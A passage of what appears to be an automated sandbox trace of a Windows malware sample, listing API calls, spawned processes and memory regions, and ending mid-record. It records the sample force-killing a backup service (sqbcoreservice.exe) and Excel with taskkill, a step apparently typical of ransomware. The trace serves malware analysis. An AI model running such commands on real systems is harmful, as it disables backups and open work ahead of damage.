_wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.905] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.906] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.906] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.906] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.906] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.906] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.906] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.906] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.906] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.906] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.906] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.906] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.906] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.906] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.906] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.906] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.906] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.906] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.906] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.906] GetProcessHeap () returned 0x640000 [0202.906] RtlFreeHeap (HeapHandle=0x640000, Flags=0x0, BaseAddress=0x6478d8) returned 1 [0202.906] GetProcessHeap () returned 0x640000 [0202.906] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xa) returned 0x6472a0 [0202.906] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0202.910] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im sqbcoreservice.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im sqbcoreservice.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im sqbcoreservice.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x96c, dwThreadId=0xcc4)) returned 1 [0202.930] CloseHandle (hObject=0x98) returned 1 [0202.930] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0202.930] GetProcessHeap () returned 0x640000 [0202.930] RtlFreeHeap (HeapHandle=0x640000, Flags=0x0, BaseAddress=0x649d98) returned 1 [0202.931] GetEnvironmentStringsW () returned 0x649d98* [0202.931] GetProcessHeap () returned 0x640000 [0202.931] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xa76) returned 0x647f20 [0202.931] FreeEnvironmentStringsA (penv="=") returned 1 [0202.931] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0204.139] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0204.139] CloseHandle (hObject=0x9c) returned 1 [0204.140] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0204.140] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0204.140] GetProcessHeap () returned 0x640000 [0204.141] RtlFreeHeap (HeapHandle=0x640000, Flags=0x0, BaseAddress=0x647f20) returned 1 [0204.141] GetEnvironmentStringsW () returned 0x64b1a0* [0204.142] GetProcessHeap () returned 0x640000 [0204.142] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xa9c) returned 0x647f20 [0204.142] FreeEnvironmentStringsA (penv="=") returned 1 [0204.142] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0204.142] GetProcessHeap () returned 0x640000 [0204.143] RtlFreeHeap (HeapHandle=0x640000, Flags=0x0, BaseAddress=0x647f20) returned 1 [0204.143] GetEnvironmentStringsW () returned 0x64b1a0* [0204.143] GetProcessHeap () returned 0x640000 [0204.143] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xa9c) returned 0x647f20 [0204.144] FreeEnvironmentStringsA (penv="=") returned 1 [0204.144] GetProcessHeap () returned 0x640000 [0204.144] RtlFreeHeap (HeapHandle=0x640000, Flags=0x0, BaseAddress=0x6472a0) returned 1 [0204.144] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0204.144] _get_osfhandle (_FileHandle=1) returned 0x130 [0204.144] SetConsoleMode (hConsoleHandle=0x130, dwMode=0x0) returned 0 [0204.144] _get_osfhandle (_FileHandle=1) returned 0x130 [0204.145] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0204.145] _get_osfhandle (_FileHandle=0) returned 0x158 [0204.145] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0204.145] GetConsoleOutputCP () returned 0x1b5 [0204.147] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0204.147] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.149] exit (_Code=128) Thread: id = 287 os_tid = 0xeac Process: id = "55" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x3111c000" os_pid = "0x96c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "54" os_parent_pid = "0xd98" cmd_line = "taskkill /f /im sqbcoreservice.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4031 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4032 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4033 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4034 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 4035 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 4036 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 4037 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 4038 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 4039 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 4040 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 4041 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 4042 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4043 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4044 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4045 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4046 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 4047 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4048 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 4049 start_va = 0x45f0000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045f0000" filename = "" Region: id = 4050 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4051 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4052 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4053 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4054 start_va = 0x4400000 end_va = 0x45cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 4055 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4056 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4057 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4058 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4059 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4060 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4061 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4062 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4063 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 4064 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 4065 start_va = 0x44d0000 end_va = 0x45cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044d0000" filename = "" Region: id = 4066 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4067 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4068 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4069 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4070 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4071 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4072 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4073 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4074 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4075 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4076 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4077 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4078 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 4079 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 4080 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 4081 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 4082 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 4083 start_va = 0x30000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4084 start_va = 0x4480000 end_va = 0x44a9fff monitored = 0 entry_point = 0x4485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4085 start_va = 0x4600000 end_va = 0x4787fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004600000" filename = "" Region: id = 4086 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4087 start_va = 0x4790000 end_va = 0x4910fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004790000" filename = "" Region: id = 4088 start_va = 0x4920000 end_va = 0x5d1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004920000" filename = "" Region: id = 4089 start_va = 0x41f0000 end_va = 0x41f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 4090 start_va = 0x4480000 end_va = 0x4480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004480000" filename = "" Region: id = 4091 start_va = 0x4490000 end_va = 0x4494fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 4092 start_va = 0x44a0000 end_va = 0x44a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 4093 start_va = 0x44b0000 end_va = 0x44b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 4094 start_va = 0x5d20000 end_va = 0x6056fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4095 start_va = 0x6060000 end_va = 0x6149fff monitored = 0 entry_point = 0x609d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4096 start_va = 0x44c0000 end_va = 0x44c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 4097 start_va = 0x6060000 end_va = 0x613ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 4098 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4099 start_va = 0x45d0000 end_va = 0x45d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045d0000" filename = "" Region: id = 4100 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 4101 start_va = 0x45e0000 end_va = 0x45e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045e0000" filename = "" Region: id = 4102 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 4103 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 4104 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4105 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 4106 start_va = 0x6140000 end_va = 0x617ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006140000" filename = "" Region: id = 4107 start_va = 0x6180000 end_va = 0x61bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006180000" filename = "" Region: id = 4108 start_va = 0x61c0000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061c0000" filename = "" Region: id = 4109 start_va = 0x6200000 end_va = 0x623ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 4110 start_va = 0x6240000 end_va = 0x627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006240000" filename = "" Region: id = 4111 start_va = 0x6280000 end_va = 0x62bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006280000" filename = "" Region: id = 4112 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 4113 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 4114 start_va = 0x62c0000 end_va = 0x62c5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000062c0000" filename = "" Thread: id = 288 os_tid = 0xcc4 Thread: id = 289 os_tid = 0x4dc Thread: id = 290 os_tid = 0xc54 Thread: id = 291 os_tid = 0xc68 Thread: id = 292 os_tid = 0xe88 Process: id = "56" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2f41b000" os_pid = "0xa08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im excel.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4117 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4118 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4119 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4120 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4121 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4122 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4123 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4124 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4125 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4126 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 4127 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 4128 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4129 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4130 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4131 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4132 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 4133 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4134 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 4135 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4136 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: 